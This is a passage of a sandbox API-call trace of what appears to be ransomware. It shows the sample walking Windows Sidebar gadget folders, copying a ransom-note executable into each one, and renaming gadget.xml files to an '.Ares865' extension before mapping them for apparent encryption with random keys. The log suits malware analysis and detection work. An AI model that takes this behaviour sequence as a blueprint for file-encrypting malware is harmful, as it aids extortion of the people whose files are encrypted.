1 [0061.920] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0061.920] FindFirstFileW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x566964a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x566964a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0061.920] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0061.920] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0061.920] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images", iMaxLength=260 | out: lpString1="C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images") returned="C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images" [0061.920] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images" | out: lpString1="C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images") returned="C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images" [0061.920] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0061.920] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\windows sidebar\\gadgets\\rssfeeds.gadget\\images\\how to back your files.exe"), bFailIfExists=1) returned 1 [0061.928] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0061.928] FindFirstFileW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x566964a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x566964a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0061.928] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0061.928] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0061.929] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US", iMaxLength=260 | out: lpString1="C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US") returned="C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US" [0061.929] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US" | out: lpString1="C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US") returned="C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US" [0061.929] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0061.929] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\windows sidebar\\gadgets\\rssfeeds.gadget\\en-us\\how to back your files.exe"), bFailIfExists=1) returned 1 [0061.934] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0061.934] FindFirstFileW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eb25fda, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x566bc600, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x566bc600, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0061.935] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0061.935] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0061.935] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\gadget.xml.Ares865") returned 81 [0061.935] MoveFileExW (lpExistingFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\gadget.xml" (normalized: "c:\\program files\\windows sidebar\\gadgets\\rssfeeds.gadget\\en-us\\gadget.xml"), lpNewFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\gadget.xml.Ares865" (normalized: "c:\\program files\\windows sidebar\\gadgets\\rssfeeds.gadget\\en-us\\gadget.xml.ares865"), dwFlags=0x1) returned 1 [0061.937] CreateFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\gadget.xml.Ares865" (normalized: "c:\\program files\\windows sidebar\\gadgets\\rssfeeds.gadget\\en-us\\gadget.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0061.937] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=1005) returned 1 [0061.937] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0061.937] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3058 [0061.937] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0518 [0061.937] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f00d8) returned 1 [0061.938] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0061.938] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0061.938] CreateFileMappingW (hFile=0x15c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x6f0, lpName=0x0) returned 0x118 [0061.940] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x6f0) returned 0x190000 [0061.941] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f00d8) returned 1 [0061.941] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0061.941] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0061.942] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d31c0 [0061.942] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\js", iMaxLength=260 | out: lpString1="C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\js") returned="C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\js" [0061.942] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\js" | out: lpString1="C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\js") returned="C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\js" [0061.942] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0061.942] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\js\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\windows sidebar\\gadgets\\rssfeeds.gadget\\en-us\\js\\how to back your files.exe"), bFailIfExists=1) returned 1 [0061.947] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0061.947] FindFirstFileW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\js\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eb25fda, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x566e2760, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x566e2760, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0061.947] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0061.947] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0061.947] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\css", iMaxLength=260 | out: lpString1="C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\css") returned="C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\css" [0061.947] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\css" | out: lpString1="C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\css") returned="C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\css" [0061.947] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0061.947] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\css\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\windows sidebar\\gadgets\\rssfeeds.gadget\\en-us\\css\\how to back your files.exe"), bFailIfExists=1) returned 1 [0061.951] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0061.951] FindFirstFileW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\css\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eb25fda, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x566e2760, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x566e2760, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0061.951] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0061.951] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0061.951] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget", iMaxLength=260 | out: lpString1="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget") returned="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget" [0061.951] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget" | out: lpString1="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget") returned="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget" [0061.951] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0061.952] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\windows sidebar\\gadgets\\picturepuzzle.gadget\\how to back your files.exe"), bFailIfExists=1) returned 1 [0061.959] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0061.959] FindFirstFileW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x566e2760, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x566e2760, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0061.959] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0061.959] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0061.960] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images", iMaxLength=260 | out: lpString1="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images") returned="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images" [0061.960] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images" | out: lpString1="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images") returned="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images" [0061.960] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0061.960] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\how to back your files.exe"), bFailIfExists=1) returned 1 [0061.965] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0061.965] FindFirstFileW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x567088c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x567088c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0061.965] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0061.965] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0061.966] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US", iMaxLength=260 | out: lpString1="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US") returned="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US" [0061.966] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US" | out: lpString1="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US") returned="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US" [0061.966] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0061.966] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\windows sidebar\\gadgets\\picturepuzzle.gadget\\en-us\\how to back your files.exe"), bFailIfExists=1) returned 1 [0061.971] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0061.971] FindFirstFileW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eb25fda, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x567088c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x567088c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0061.972] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0061.972] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0061.972] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\gadget.xml.Ares865") returned 86 [0061.972] MoveFileExW (lpExistingFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\gadget.xml" (normalized: "c:\\program files\\windows sidebar\\gadgets\\picturepuzzle.gadget\\en-us\\gadget.xml"), lpNewFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\gadget.xml.Ares865" (normalized: "c:\\program files\\windows sidebar\\gadgets\\picturepuzzle.gadget\\en-us\\gadget.xml.ares865"), dwFlags=0x1) returned 1 [0061.973] CreateFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\gadget.xml.Ares865" (normalized: "c:\\program files\\windows sidebar\\gadgets\\picturepuzzle.gadget\\en-us\\gadget.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x120 [0061.973] GetFileSizeEx (in: hFile=0x120, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=1010) returned 1 [0061.973] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0061.974] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3058 [0061.974] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0061.974] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0518) returned 1 [0061.974] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0061.974] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0061.975] CreateFileMappingW (hFile=0x120, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x700, lpName=0x0) returned 0x118 [0061.976] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x700) returned 0x190000 [0061.977] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0518) returned 1 [0061.978] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0061.978] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0061.978] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d31c0 [0061.978] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\js", iMaxLength=260 | out: lpString1="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\js") returned="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\js" [0061.979] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\js" | out: lpString1="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\js") returned="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\js" [0061.979] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0061.979] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\js\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\windows sidebar\\gadgets\\picturepuzzle.gadget\\en-us\\js\\how to back your files.exe"), bFailIfExists=1) returned 1 [0061.982] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0061.982] FindFirstFileW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\js\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eb25fda, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x5672ea20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5672ea20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0061.982] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0061.982] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0061.983] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\css", iMaxLength=260 | out: lpString1="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\css") returned="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\css" [0061.983] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\css" | out: lpString1="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\css") returned="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\css" [0061.983] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0061.983] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\css\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\windows sidebar\\gadgets\\picturepuzzle.gadget\\en-us\\css\\how to back your files.exe"), bFailIfExists=1) returned 1 [0061.988] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0061.988] FindFirstFileW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\css\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eb25fda, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x5672ea20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5672ea20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0061.988] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0061.988] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0061.988] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget", iMaxLength=260 | out: lpString1="C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget") returned="C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget" [0061.988] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget" | out: lpString1="C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget") returned="C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget" [0061.988] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0061.988] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\windows sidebar\\gadgets\\mediacenter.gadget\\how to back your files.exe"), bFailIfExists=1) returned 1 [0061.994] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0061.994] FindFirstFileW (in: lpFileName="C:\\Program Files\\Windows 